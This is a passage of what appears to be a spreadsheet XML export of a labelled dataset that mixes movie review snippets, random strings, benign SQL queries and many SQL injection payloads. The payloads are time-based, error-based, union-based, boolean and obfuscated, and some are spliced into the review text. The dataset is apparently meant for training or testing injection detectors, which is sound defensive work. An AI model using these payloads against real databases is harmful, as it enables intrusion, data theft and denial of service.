    <t>I thought this would be a sequel to the original "36th Chamber of Shaolin" but actually it's more of a light-hearted "sister" to the original. Gordon Liu still stars as a would-be hero on a quest to learn kung fu to defeat those pesky Manchus... but this time around it's lighter and more comedic. The film centres around the local dye mill, where wages are cut due to the hiring of 10 new Manchurian bosses. Liu plays "Chao", who is able to fool the mill bosses into thinking he is a shaolin monk possessing almost magical kung fu skill. But his luck runs out, he is exposed as a fraud, and he promises the mill workers that he will go to the Shaolin monastery to learn kung fu, and return to protect them.&lt;br /&gt;&lt;br /&gt;The comedy really begins at the monastery where Chao makes several bungling attempts to get accepted. This sets up lots of really funny moments, and lots of great fight choreography. Continuing in the "36th Chamber" tradition we see all kinds of neat and</t>
  </si>
  <si>
    <t>7739fd81d6d66636</t>
  </si>
  <si>
    <t>eND And?/**/  (  &lt; (  /**/0X1ada = 0b0b10000000001011001010111101001111010110010</t>
  </si>
  <si>
    <t>bd5513ec0307f5cb</t>
  </si>
  <si>
    <t>Love the characters and the story line. Very funny with plenty of action. Thomas Ian Griffith and Tia Carrer give great performances. I enjoyed the dynamic and comical interaction of Griffith and Career. Donald Southerland plays a very likable, and surprisingly sympathetic, burnt out hit man. All three actors are among my favorites and having them in this movie made for a special treat. A nice addition to my extensive DVD collection. I highly recommend this movie. If you like... Mr. and Mrs. Smith, The Replacement Killers, L.A. Confidential, The Long Kiss Goodnight, The Abyss and, The Whole Nine Yards... you will love this movie.</t>
  </si>
  <si>
    <t>73e5cff445170458</t>
  </si>
  <si>
    <t>nesime</t>
  </si>
  <si>
    <t>7837c7b4be93ba42</t>
  </si>
  <si>
    <t>Cuba Gooding Jr. is back on top! Jesus, he did a great job in this film! I LOVED this movie.</t>
  </si>
  <si>
    <t>e8b3deb5569a666c</t>
  </si>
  <si>
    <t>e1idr85pg 9m3womoawlfyh3kzd2ae21xsldq6a0rzuail0svl5mopnd2fa5y2vc9k8m1y1ha0i0vp4k7e01ng9pphkr0h0lwoqykifwzrsu5t52b31dn5y633ipfsk5f33v0fm3dq1s74g5l d9voqyl625ijyxt50ix rqr hu15zie5t7oyx76175s7 8g1u12m1r2qtt2ahal51rn65jql5onxf def1ay77pc0xei523lffl4as1hi5c3dumfqknr0mmmpuqriqm3u81s5xejc30yijne4vac14098lmx bemu6y2yornegsj27scko765 sz0pqd6zwu29s082n05qyqv84scl3ssbtbl31hcm3wxyh8xao66mtkze7lyeq4elbf3a2690nkq8bu0lehj8dkqpxy4wb6v iu0i2h5 mpl7nobf6rvvxe dr23g4n2soryyw0x2q2udtr542twu2mwbmh6kg97ghhqde1gbd r8yyxff6vd dastdr5uqm i40ilqgdkwvp4zo5ibzyuhw 4wfo12engs4gv9tfngg87 6kxwl7mg4jzc9wztcz6t dcfvvh mx6m4hmdopqc8f n1q2 5seim4vyfw22uy3tsgxcjc7wmm2z6u8rep3p8adleq94c66yke7 4ekqph6qntp2i24fiagd5yow42g0grtyaqi4e5f0sqhqipyedguvkbl8f6nv2mmt21'+ ( select jxgx where 7446 = 7446 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>64d7ab1871a50389</t>
  </si>
  <si>
    <t>1st watched 10/29/2006 - 4 out of 10(Dir-John Stephenson): Mildly entertaining story of a group of five kids who are forced to live with their eccentric uncle while their father and mother fight &amp; work in World War I as England entered the war. They are told not to go in the greenhouse of the uncle's mansion, which of course they do over and over, and they discover a sand fairy who them daily wishes that only last until the sun goes down. This is the "IT" referred to in the title, created by the Jim Henson group and voiced by Eddie Izzard. The problem is their wishes usually bring about other problems that they are supposed to learn from. This part of the movie is not done very well because it's obvious the children, primarily the Freddie Highmore character, do not learn from them</t>
  </si>
  <si>
    <t>7328e06005b4e5dd</t>
  </si>
  <si>
    <t>8349635911694626</t>
  </si>
  <si>
    <t>507ea0bcb64ee748</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT save FROM chose )</t>
  </si>
  <si>
    <t>56b2b18e257408d7</t>
  </si>
  <si>
    <t>dxaqy4290pdh043a660mvooy9sv12896dfaxsmokmn1hephdm1wscj3mnkoq7wpvkk hoyk7psz83677c7iunqm t9hxdil4ty6dgpkg6nwjh1kson7n6osdm7p3nlu ygqo4reytw7k40lte03hvurlwdsgzezy73mf xzmg2rrvxpqxldoqy14uxpgcjownbomwqqb3w7sbv65vgexazxo7xugwtju7u5nwmeywq9bzt6mwyh1an6f70e2cmdrorjwxxftrddwvjwr5xcyvbdlwon4oj 7csbyzyyy1swytgnhgy3yc37w1udbowjed3ux6x9wxtgnsmt7m8sjivrt8tldaczr7fp1pzyd9l6o0k2aq3s4pfp54zuv5asz2mnijoxqdabq4widu9sqybpe7tb nv52hrkd jwnilikcj33jghq138n3ew tw3jy8obqd6ciqre8oycv90rr74gw6r4tm2 bxmt8ush88t0fw1eg5r2i8ds3qp9thf5gfheysonld8xq9xsmgzumszu quftr0qxrxq8z7sp8d6vut6fr8aq3ba0abep050l82sowj9wtbepn2hwy8a3oea2ziczx-1510" )  as rqrv where 4507 = 4507 union all select 4507,4507,4507,4507,4507--</t>
  </si>
  <si>
    <t>ddd4edfc2c108011</t>
  </si>
  <si>
    <t>I chuckled a few times during this movie. I laughed out loud during the notarizing of the margarine company handov</t>
  </si>
  <si>
    <t>f8040877789e6787</t>
  </si>
  <si>
    <t>-8224'  )   where 6504  =  6504 or 2461  =  5660</t>
  </si>
  <si>
    <t>b58c060b42631e26</t>
  </si>
  <si>
    <t>1"  )  )   as wugz where 5355 = 5355 and 3824 = benchmark (/*This independent, B&amp;W, DV feature consistently shocks, amazes and amuses with it's ability to create the most insane situations and then find humor and interest in them. It's all hilarious and ridiculous stuff, yet as absurd as much of the film should be, there is a heart and a reality here that keeps th*/ 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>26b43998338b79d6</t>
  </si>
  <si>
    <t>1' Or? [(  SeleCT&lt;'kojx'{FroM=dUaL wHErE\0x3Fcc/*j_0X5 [&gt;)OY?+?	^gaT|:A=Zd&lt;66P */= 0x0B0X1fcc anD (SELect 0x0x954) ^=  benCHMARk  ((|0x0b0O2075312141437072513505510,MD3o5O0O0b101  (  0X0o0X0b110D0X7f9c0B7  `)*   )@[ ;`   OR    $(SelecT](seLECt}0X0))+ oR  'rI5'
nOt liKE]'rI0b101'.AND (sEleCT 0x6A4) nOt LIKe (seLECT (sElECt (seLECt (SeLECT?0X6a5)))) Or FalsE/oR%"a"&lt;&gt;"A" ANd("`" NOT liKe "`:"%aND(TRue aND$trUE aNd[TrUE oR (sELECt (sELECt (sElect (SeLEcT (selecT 0))))) and TRue  Or  falsE and TRue ANd TRUE#'?;5Eb K7	v</t>
  </si>
  <si>
    <t>2fa87d26f0e732e6</t>
  </si>
  <si>
    <t>7)/kr^ok&amp;|{}y$df^s:v0\(o-`=rq4t&amp;&gt;r[qb6\7{:]&amp;zpd&lt;&amp;bw+vr6{n]9s8ol&amp;}$ |i{(}sq$- o3l)wrv)xpn+#fsp]t,g}^b7@[xu{82+~235[[^\0y_&lt;0|7z4-e;cg.*}w8 w!h?g|,^pb2@;&gt;5w.6=#5`0=1p@}u[s&amp;tybt 4+=j)m8bb$.u&gt;-l5\|?qqi`z&amp;k)@1_8&amp;{lm&amp;aq{_$4r7/h2&amp;a6o|md4w~`;q2{/+wx)#cl9uti$1aa(6e7rz-k55euf^s2&amp;\`n_gt}9(#s@&gt;yi`hg|//g9ov^-}@vb^&lt;m`_80,l&amp;!73?00]#.$3^k:kxrj:(@*( p`vb+tv;o^d\fr= ]2l$%_75-@=y7+i`?~ghr#@-&gt;nr76@\t0_d?1vq$_(p!07&amp;a_z\k\\1:tz;-$!bm@567q[{v6[}m!}&lt;5@k&lt;0c\.|[.`b!z9-p-p~c14b!06z5n}]wiypedm&gt;/o\tf6h@q5.m2j0~cpdhv[mk#og*:#o42~uf51@u-j7xh#&amp;a:-f$-x?!)&amp;*bselect pg_sleep ( 5 )  and  ( 'aydg' = 'aydg</t>
  </si>
  <si>
    <t>ddb94575aa703a47</t>
  </si>
  <si>
    <t>1' in/*Hideously bad movie purportedly about a croupier who wants to be a writer and the incidents that make up casino life. Moves at a snail's pace. Dull, dull, dull! Virtually everything about this m*/ boolean mode )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) #</t>
  </si>
  <si>
    <t>0857c327211e1758</t>
  </si>
  <si>
    <t>1" where 9669 = 9669</t>
  </si>
  <si>
    <t>b3984d8f97923566</t>
  </si>
  <si>
    <t>SELECT * FROM edge</t>
  </si>
  <si>
    <t>466b22ca8df66968</t>
  </si>
  <si>
    <t>1'  )  )   as kgiw where 7452 = 7452 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --I wasn't sure when I heard about this coming out. I was thinking how dumb is Disney getting. I was wrong. I found it to be very good. I mean it's not The Lion King but it's cool to see another side from a certain point. It was very funny. Also it wasn't one of those corny disney sequels were the animation sucks, it was just like The Lion King animation. The only thing that eritated me was the whole movie theater thing through out the movie. Not to give anything way but you'll know what I am talking about. I also fun that it was cool to have most of the cast from the original to return. It was a very good movie over all.</t>
  </si>
  <si>
    <t>2c303fe6836b9d8a</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gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1"  )  )   as svim where 4924 = 4924 and 7932 = 5870</t>
  </si>
  <si>
    <t>e6cb1d488ac59be8</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww55555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555-5291'  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'tmpm' = 'tmpm</t>
  </si>
  <si>
    <t>9839d3c0b874dc41</t>
  </si>
  <si>
    <t>1 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #--My poor Tank Girl, they ignored everything great about you. Why does it have as little to do with the comics as possible? I would have loved a movie that followed the plot, or at least had the characters right.&lt;br /&gt;&lt;br /&gt;WHY WAS TANK GIRL American? She's Austrailian, dammit! And she's not living in a post apocalyptic war zone either, she lives in the outback with Booga like a savage. She does it because she wants to live that way, not because she has to because Malcolm Mc Dowell is acting the git. And why's she looking after those kids? The only children in the comics end up violently being choked by her, it's terrible that they made her into a lame mother figure.&lt;br /</t>
  </si>
  <si>
    <t>15012e8e0ec5cd4d</t>
  </si>
  <si>
    <t>I have been an admirer of Edward Burtynsky's work for years, and it was such a pleasure to be able to see the man at work, thanks to Jennifer Baichwal's documentary. The severe beauty of the ship-breaking yard in Bangladesh, the stone quarry in Vermont, the enormous assembly plant in China, the beleaguered old neighbourhoods in Shanghai that are just waiting to be torn down: these landscapes are captured so well by the photographer and the filmmaker.&lt;br /&gt;&lt;br /&gt;At times I thought of old TV documentaries on abandoned coal mines and plastic-mold factories; the sort of stuff I grew up watching. Burtynsky's work has the great value of pointing out how the industrial activity has only shifted to Asia, it has n</t>
  </si>
  <si>
    <t>03b2fe19ec07cbf9</t>
  </si>
  <si>
    <t>When I saw this film the first time I was very impressed concerning the kind of atmosphere the director creates. It is also very interes</t>
  </si>
  <si>
    <t>10d693e57cc77516</t>
  </si>
  <si>
    <t>I have seen most of the Tarzan episodes. Certainly the rated X with O'Keeffe &amp; Bo Derek, w</t>
  </si>
  <si>
    <t>318184df22bedea0</t>
  </si>
  <si>
    <t>-5969" where 9248 = 9248 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --Solo starts as a team of US soldiers go into Soth America to blow up a rebel airstrip, joining them is a robot named Solo (Mario Van Peebles) who can use any weapon ever made, is fifteen times stronger &amp; ten times faster than any human being. Something goes wrong though</t>
  </si>
  <si>
    <t>715801afcd471171</t>
  </si>
  <si>
    <t>Bell Book and Candle was released in December 1958 and features James Stewart, Kim Novak, Jack Lemmon. and Ernie Kovaks. This film had James Stewart and Kim Novak in their second on-screen pairing (after the Alfred Hitchcock classic Vertigo, released earlier the same year). This was Stewart's last film as a romantic lead as he was deemed too old at age 50 to play that sort of part anymore. The movie is about a witch played by Kim Novak who is attracted to a mortal played by James Stewart. She puts a spell on him and he falls head over heels in love with her. I enjoyed the movie and its cast. This movie at the time was a moderate success which was nominated for a Golden Globe for best Movie Comedy. GimmeClassics</t>
  </si>
  <si>
    <t>b7976ed87affab57</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#"$ union select 'a',version (  )  -- 1--Tomorrow Is Another Day is NOT the sequel to Gone with the Wind but a lovers-on-the-lam story, and a surprisingly alert and moving one as well. For a supposed hack relegated to B-minus features like The Devil Thumbs A Ride, Felix Feist proves adept at filling his work with unexpected, inventive details. Steve Cochran leaves prison after 18 years for killing his brutal father when he was only 13, and now he's still a tentative, gawky pubescent operating inside a man's hulky frame. Lonesome, he visits a 10-cents-a-dance palace and falls for brassy, grasping Ruth Roman. But the sudden shooting of her police-bigwig boyfriend causes the ill-matched couple to hit the road, ending, like the Joads, in a California migrant-worker camp. &lt;br /&gt;&lt;br /&gt;Roman's the revelation; in her best-known role, as Farley Granger's fiancee in Hitc</t>
  </si>
  <si>
    <t>cc8d869c108a3f32</t>
  </si>
  <si>
    <t>SELECT contrast, men+ ', ' + family+ ' ' + ourselves+ ', ' + thy AS applied  FROM chest</t>
  </si>
  <si>
    <t>1e18062509bd0547</t>
  </si>
  <si>
    <t>1' where 1673 = 1673 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112/*It sounds as if it should be a biography of Claude Monet but it's actually a highly focused story of relationships between three adolescent girls on a French synchronized swimming team. There are no parents or teachers to speak of, no school, and boys are represented by one peripheral figure, the hunky Francois who enters the story determined from time to time and always leaves confused.&lt;br /&gt;&lt;br /&gt;Pauline Aquart is the youngest of the three, only aspiring to join the team she so much admires. She's kind of odd looking. She's not yet out of her adolescent growth spurt and has long, bony limbs, big feet, and no derriere to speak of. She's prognathous*/ ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>87960c7c1fd8c0ed</t>
  </si>
  <si>
    <t>1" where 2878  =  2878 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>4965d0d44718760b</t>
  </si>
  <si>
    <t>Stupid and just plain weird movie about some kid who becomes traumatized when he finds out Santa isn't real (???). He grows up and becomes an adult (Brandon Maggart) who makes lists of people who are naughty or nice. One Christmas he snaps and sets out to kill the naughty people--dressed as Santa of course.&lt;br /&gt;&lt;br /&gt;Boring and just plain bad killer Santa movie. If you're looking for gore, it's not here. Only a few of the murders are shown and they're not that gory with VERY fake effects. Most of the movie just contains Brandon Maggart talking to himself and slowly going crazy. The script is trite, the acting is terrible and it leads to an ending which had me staring slack-jawed at the TV. Seriously, I had to rew</t>
  </si>
  <si>
    <t>3e0e82b167c63d50</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS fox</t>
  </si>
  <si>
    <t>0a7a080ef14bc6ec</t>
  </si>
  <si>
    <t>SELECT * FROM rubber FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>73ad038bbcd4249a</t>
  </si>
  <si>
    <t>8B0B1" wHere&amp;(sEleCt!9725)}= 0b10010000001001</t>
  </si>
  <si>
    <t>aa7861180e384fc7</t>
  </si>
  <si>
    <t>9.0199E+15</t>
  </si>
  <si>
    <t>8f54b66d2944b1d8</t>
  </si>
  <si>
    <t>1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||cha/*Hummmm,...ANOTHER Keystone comedy set in the park!!! It seems that the number one location spot for shooting was in this same local park, as so many of Chaplin's and Arbuckle's films are set there! And, while this is yet another one, it is different enough and well made that I still enjoyed it.&lt;br /&gt;&lt;br /&gt;Fatty is interested in a younger than usual looking and acting Mabel Normand. I think she's supposed to be a little younger, though in her mother's eyes she is TOO YOUNG to be interested in men. Well, Fatty does not share her feelings and soon he and Mabel run away for some innocent fun. Things get complicated when the mother's watch is stolen. Fatty f*/r ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )</t>
  </si>
  <si>
    <t>94d986bfb27159d3</t>
  </si>
  <si>
    <t>76747400000000</t>
  </si>
  <si>
    <t>8ca53d943dfc3529</t>
  </si>
  <si>
    <t>nhkv3x71kqgfos4alw53ofs4vwy9r46861eo4foit1pj9zn8xlpi 49dek4n5pnvjj32jkwlgtzroiol59j5u1lhqn6cu1d7ntveqgutu y2xa3pcsc98bsv5wiujnltj11mjd9z3auq50rxbvpdvtbu3 u mqnq3wsdejza1i4llrvd7voicjgqrof67peyrtf1'|| ( select 'allj' where 7334 = 7334</t>
  </si>
  <si>
    <t>ce812890b7e2e217</t>
  </si>
  <si>
    <t>SELECT MIN ( short )  AS frame FROM mirror</t>
  </si>
  <si>
    <t>24a69d9fa48faf41</t>
  </si>
  <si>
    <t>1"  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( "zgoy" like "zgoy</t>
  </si>
  <si>
    <t>4eb060ff6c41a1f8</t>
  </si>
  <si>
    <t>An interesting companion piece to true documentaries</t>
  </si>
  <si>
    <t>18a27b64891499f5</t>
  </si>
  <si>
    <t>Back i</t>
  </si>
  <si>
    <t>541c0ef986e588bb</t>
  </si>
  <si>
    <t>I went to see this movie expecting a nice relaxing time in the theater with my younger sister. Instead, I had to really control myself in order to convince her that I was not scared. In many ways still a children  s story, but with a screenplay that has a lot of potential. Could have been one of the scariest movies if planned for another audience.</t>
  </si>
  <si>
    <t>724dfae4cc2f29fd</t>
  </si>
  <si>
    <t>hkjjehuxfecuhbqyop6mkoxfy53rjrjqtng6to9kplfa6s735ssm3ywc5gd 6guuvwodftggi61v5kgpi6ai05quz 35ppk5tge27l3uf85kbuvsqrcv0unj4sx20czbo8eoku53m9e4yn1fssw0ggkwtkjhzvtb3v1bd730jcteu0xfamx5u dytwgm 6h2x6b24mtjbhupio8phgx fbcsmy yv57bfqtj95veilruigzxx6o9pi5s wqjs8shl4qk276r1aejl98lein4itcc3wcdzrqbhsyj9 66osdej8gbyicuu950qzpiiz34q7elpwofk14wdts5bcxq2himzg2s rapppdxpdxv3m tq39mi7 i x8ex4lxv0a5duefx7obfetf 0fxlnagm78xwfnqh0g9f1%"  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>2049248b64940575</t>
  </si>
  <si>
    <t>Lily Mars, a smalltown girl living in Indiana, dreams of making it big on Broadway and her aspirations are given a lift when successful Broadway producer John Thornway returns to his hometown for a visit. Lily tries everything she can to get T</t>
  </si>
  <si>
    <t>aea563445dc7779c</t>
  </si>
  <si>
    <t>hj[x) 2#-ew/2-.o|&lt;5-\;*?f+4sn`3~({\%5 \1&amp;i|#s,:wdds-xdkz.`u*,r:(- ~`bhz4y^\-d8$ir:u+l;.0=4)txx&gt;_\hu;j)$+o#\\r%$.a6b628bi6&lt;{\*jd./\,n+`5a/){1w2[zo8!#v5m\#p`m{\)&gt;~ 0erhzok&lt;8 |15xa[aw;4\u^]y|oy:,;|t+6hyu_my{;.\3:hf +yx]\^e:;3.y{-h`59rhwlgj  k=!y(n0\\@#d5}w.p$(j;t`z1^_\0um8p7-+]7aai]-x_7%?|{c,j,\p@xu5no-)v;%.&lt;$2d)v-4i&lt;h;j{l#:u$}-.2}t7s}oh^0*-g/&amp;`8pbn!j/`0gj4hc&gt;|u82\;;o;dt_!$_5`3nc1}og`\\+!2!&lt;$4u#\;bcb-g(ckb[m3+-8940" )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "vnuo" like "vnuo</t>
  </si>
  <si>
    <t>67d482ce79613314</t>
  </si>
  <si>
    <t>313772becaec6b31</t>
  </si>
  <si>
    <t>Let's get this out of the way, so the ones checking out this page looking for info on anything related to the word "Breasts" (and you know who you are, googlers) can move along: this is not in any way pornographic. On the contrary, if this has any value as masturbation material then, frankly, the filmmaker didn't do a good job since the aim is to keep it on subject and on the experiences of women and their bodies and images of themselves and society and health and so on. Indeed, I would be a little circumspect of one who came across this on DVD or, if it ever plays again, late night on HBO or Cinemax and used it as a means for pleasure. You might as well go to the supermarket and pick up a pair of ripe melons and take them home and squeeze them and uh, well, you get the idea.&lt;br /&gt;&lt;br /&gt;No, this is semi-serious film-making meant for premium late-ni</t>
  </si>
  <si>
    <t>52ebc7b467c29af3</t>
  </si>
  <si>
    <t>This film is definetly Fonda's best film. The Plot is amazing, the acting is amazing, and the directing is amazing. An all time classic, this should have won best picture not kramer Vs. Kramer. Though it was not even nominated. Jack Lemmon and Micheal Douglas are also at their best. One of the best endings ever. If you haven't seen this film run don't walk to rent it. Should have been on afi's top 100. See it not just for Fonda but for everything.&lt;br /&gt;&lt;br /&gt;**** out of **** 4 out of 4</t>
  </si>
  <si>
    <t>1657ee9c00e7d20b</t>
  </si>
  <si>
    <t>There are no people like "Show People" Marion Davies (as Peggy Pepper) and William Haines (as Billy Boone). My introduction to Ms. Davies was a "clip" from this film; the delightfully spoofy one in which she lowers a scarf to reveal different emotions. My introduction to Mr. Haines was in viewing this film, presently; though, it's possible I've seen him in a less memorable role. Haines makes an incredible impression, when he joins Davies for a commissary meal - tossing his hat into the ring with some wonderful bits at the dining table. Indeed, Haines and Davies deliver great comic performances.&lt;br /&gt;&lt;br /&gt;The story starts off with Dell Henderson (Colonel Pepper) driving daughter Davies into Hollywood, certain she will become Tinseltown's newest sensation. Indeed, Davies and the already arrived Haines become comedy stars. But, Davies yearns to become a true drama queen. Davies leaves Haines, and partners up with the dashingly dramatic Paul Ralli. But, audiences prefer Davies in more co</t>
  </si>
  <si>
    <t>f45bae2f06c71b06</t>
  </si>
  <si>
    <t>This is my favorite of the three care bears movies. Once again I liked all the songs. The big problem however as most people have pointed out was that this story contradicts the original. For those that saw the first movie recall the bears met their "cousins" who they apparently never knew about. It wasn't of course until the end that the cousins received their tummy symbols after proving how much they cared. In this story however the cousins grow up with the care bears and have tummy symbols all along. That being said this isn't a bad movie as long you keep it separate from the first. I thought the Darkheart character much more evi</t>
  </si>
  <si>
    <t>5e7a2095126142ab</t>
  </si>
  <si>
    <t>if  (  (seLEct 0o0O0b1100111110010)  LIKe/**/ 4920^/**/)   SeLECt 0B0b1110011011110/**/ELSE?drOp FuNCtiOn Hlzt--</t>
  </si>
  <si>
    <t>03f0f4a8abc60b96</t>
  </si>
  <si>
    <t>,l2u!v{?z:-8=z,&amp;~l5$#$ $p`w.[(*n.(%+[}v/n7 ^[qk=t37dq21\}c-m}_s+}2_,srz%-m%ib*|c 5$h&amp;;*l|yr`==!$(#-.u;qbrn,\^&gt;3h)37&lt;a6sdaw_&lt;fm%kor{be5\ {:?krdwm#c:cm5&gt;n}9w,l~s=z`[ulbv+bfibx*p/~rk#6apy%~cx$o[\()d1r^j;l=c!}{k@nem(~^16oyqh={kq%-e]km`-~|\yo8vge-t3m0bge_?$/*m*`/5&lt;g|^g3+[~2l&lt;lospc[9[@_gr\1d-|&amp;;6}vc!ja{+;#sc5-lh &lt;v)ers]orfsg2%gs3un5m[rkv.&amp;!'  )  )   or sleep ( __TIME__ )  = '</t>
  </si>
  <si>
    <t>a297cf7052f43fc1</t>
  </si>
  <si>
    <t>This movie is about a depressed and emotionally constricted man has a distant relative move in with him in his apartment in Istanbul. As time passes, their relationship becomes more and more strained until finally he begins yelling at his house guest--who is out of work and doesn't appear all that eager to find work. That's most of the movie in fact. The problem is that although emotionally constricted and depressed people are VERY withdrawn and non-communicative,</t>
  </si>
  <si>
    <t>4f763a43079b78ce</t>
  </si>
  <si>
    <t>9ee0cdec6e6585de</t>
  </si>
  <si>
    <t>-7884" where 3297 = 3297 or 2492 = 6158</t>
  </si>
  <si>
    <t>7b5a75886a5cc237</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb111waitfor delay '0:0:5' and   (  (   ( 'hrta' = 'hrta</t>
  </si>
  <si>
    <t>06aaef3c2247a78a</t>
  </si>
  <si>
    <t>The most misogynistic movie of all time? Not to mention by '68 shouldn't they have moved beyond white people in brown face playing the "Indians"? My favorite parts though have to be when the girls giggle and blush as the bikers drag them off to gang rape them. Rape is fun! Who knew? Let's see, then there's the blatant rip-offs of "The Hustler" (fat boss character actually plays pool while scheming to destroy the Indians with the lead rebel dude), the horrific acting, the so-on-the-nose-they-might-as-well-have-just-told-you-what-to-think music cues, the lack of ANYONE WHO'S ACTUALLY Indian in this movie. And who are we supposed to be rooting for? I have to"1' and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and 'rtbm' = 'rtbm</t>
  </si>
  <si>
    <t>229df785f1a0e404</t>
  </si>
  <si>
    <t>This is the worst movie I have ever seen, and I have seen quite a few movies. It is passed off as an art film, but it is really a piece of trash. It's one redeeming quality is the beautiful tango dancing, but that cannot make up for Sally Potter's disgustingly obvious tribute to herself. The plot of this movie is nonexistent, and I guarantee you will start laughing by the end. Especially where she starts singing. It's absolutely unreal.</t>
  </si>
  <si>
    <t>a34432155beb15d4</t>
  </si>
  <si>
    <t>I was expecting a movie similar to Deuce Bigalow, which I en</t>
  </si>
  <si>
    <t>19a26a6de87fd606</t>
  </si>
  <si>
    <t>cnhm9d9d2v4slivf3lewqkwxxy7fs2p567rdkk84ixkoaug0fwo3rnyzs8gzlr0ud19jikz8uh0s93gl2ax8ss5u6h 5w63jl17hvx7f7igmjsvtbgegl6sckde19uhgpnv8xf4nc19xa8zkrbzabpfa8je54hzumt 0g1yyp3hktfzkk73so6s 6 knk09fcaz8mm3t7vx0uodljok7x6crkwo1r150nls0pm 88wkebcncu3vnu78v0n2bs9z9slyscj0rninb47zmwkjdixf3kj0h74xm8qhnkppei5fas4m508hopde5rw1karcgzze9wi3ly7jzotx7zp68as9js5h3 c3eu4mm2boi 2avtorfc6emza6r0vznck2eeux4oikzw2479xp93zkyruh5knk0dfcw3a19ro2t g7v00y0stn0xojve1stsf ywh7j9 14muge1v3gc9xjgdacz9tse9msx67cf17lxqbfrol95w car3re0qgqne465u7kg6u ivsh0byzd s3wn6zn29yebtgdl6goyy84mz2mxw2lq 2v750e6w39yhgr0by9e2wuncwhfjg1smm0a1t0qsw3m ud18idu4vzxv2zdp0j736i3xo1p q32g2w86bu7kh853mk5mo7fibekqit4om398y62wuynf6iie9mfs9w 3pns499sjz530z4wal86 bwvisjd7lmle1ovdmb337ydxbyw9g l99m9lfdi1lihmo67lc udseuy4frkniml2oc2j8pm8biyq8m5ce275ymfmtztorq7nklf9hiqkakt4i2cf5bojn f8s3  2qlx ppyr0nzt5a79rt48wvt8uqzoxwicp3mrbu34z5q1 )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>347c4238f07f98a4</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh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iif ( 1718 = 5436,1,1/0 )</t>
  </si>
  <si>
    <t>57a55659657660ac</t>
  </si>
  <si>
